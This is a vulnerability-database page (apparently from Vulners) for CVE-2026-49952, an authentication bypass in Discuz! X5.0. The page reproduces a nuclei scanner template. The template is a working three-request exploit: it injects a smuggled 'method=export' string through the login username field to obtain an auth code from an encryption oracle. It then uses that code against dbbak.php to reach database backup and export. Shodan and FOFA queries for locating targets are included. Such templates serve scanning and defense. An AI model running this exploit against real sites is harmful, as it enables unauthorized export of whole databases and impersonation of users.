Lucene search
+L

Discuz! X5.0 - Authentication Bypass

🗓️ 30 Jul 2026 07:03:02Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Discuz! X5.0 authentication bypass enables unauthenticated access to database backup and restore.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-49952
17 Jun 202609:04
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-49952
24 Jul 202618:08
githubexploit
circl
Circl
CVE-2026-49952
15 Jun 202620:20
circl
cve
CVE
CVE-2026-49952
15 Jun 202618:43
cve
cvelist
Cvelist
CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle
15 Jun 202618:43
cvelist
exploitdb
Exploit DB
Discuz! X5.0 - Authentication Bypass
7 Jul 202600:00
exploitdb
euvd
EUVD
EUVD-2026-36792
15 Jun 202621:30
euvd
nvd
NVD
CVE-2026-49952
15 Jun 202620:16
nvd
packetstorm
Packet Storm
📄 Discuz! X5.0 Authentication Bypass
7 Jul 202600:00
packetstorm
ptsecurity
Positive Technologies
PT-2026-49307
15 Jun 202600:00
ptsecurity
Rows per page
id: CVE-2026-49952

info:
  name: Discuz! X5.0 - Authentication Bypass
  author: 0x_Akoko
  severity: critical
  description: |
   Discuz! X5.0 20260320 through 20260501 contains an authentication bypass caused by exploitation of a shared cryptographic key and encryption oracle in dbbak.php and logging_ctl::logging_more(), letting unauthenticated remote attackers access database backup and restore functions, exploit requires crafted payload injection via username parameter.
  impact: |
    Unauthenticated attackers can bypass authorization to export/import database and impersonate arbitrary users, risking full database compromise.
  remediation: |
    Update to a version later than 20260501 or latest available version.
  reference:
    - https://karmainsecurity.com/KIS-2026-09
    - https://www.exploit-db.com/exploits/52621
    - https://nvd.nist.gov/vuln/detail/CVE-2026-49952
    - https://gitee.com/Discuz/DiscuzX/commit/9962dad52c4c6999dabaf91ecd70377c680ff3c6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-49952
    epss-score: 0.01969
    epss-percentile: 0.78353
    cwe-id: CWE-323
  metadata:
    verified: true
    max-request: 3
    vendor: discuz
    product: discuz_x
    shodan-query: http.html:"Discuz! X5.0"
    fofa-query: body="Discuz! X5.0"
  tags: cve,cve2026,discuz,auth-bypass,intrusive

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Discuz! X5")'
        condition: and
        internal: true

  - raw:
      - |
        POST /member.php?mod=logging&action=login&loginsubmit=yes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=method%3Dexport%26time%3D9999999999%26&password=1&lssubmit=1

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "auth=")'
        internal: true

    extractors:
      - type: regex
        name: authcode
        group: 1
        internal: true
        regex:
          - 'auth=([^&"''<>\s]+)'

  - raw:
      - |
        GET /api/db/dbbak.php?apptype=discuzx&code={{authcode}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "errorCode=\"0\"") || contains(body, "data/backup_") || contains_any(body, "CREATE TABLE", "INSERT INTO")'
        condition: and
# digest: 4b0a00483046022100f4368b03d886afb79611f8bd1c54edb7f7d558bb72d06ea5dfb23ad6ad85d8d2022100b98a95d92c227b52f348555b5d1101a75ab4f895a107b6d7d87a2b1c27e64524:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jul 2026 04:43Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
CVSS 49.3
EPSS0.01969
SSVC
3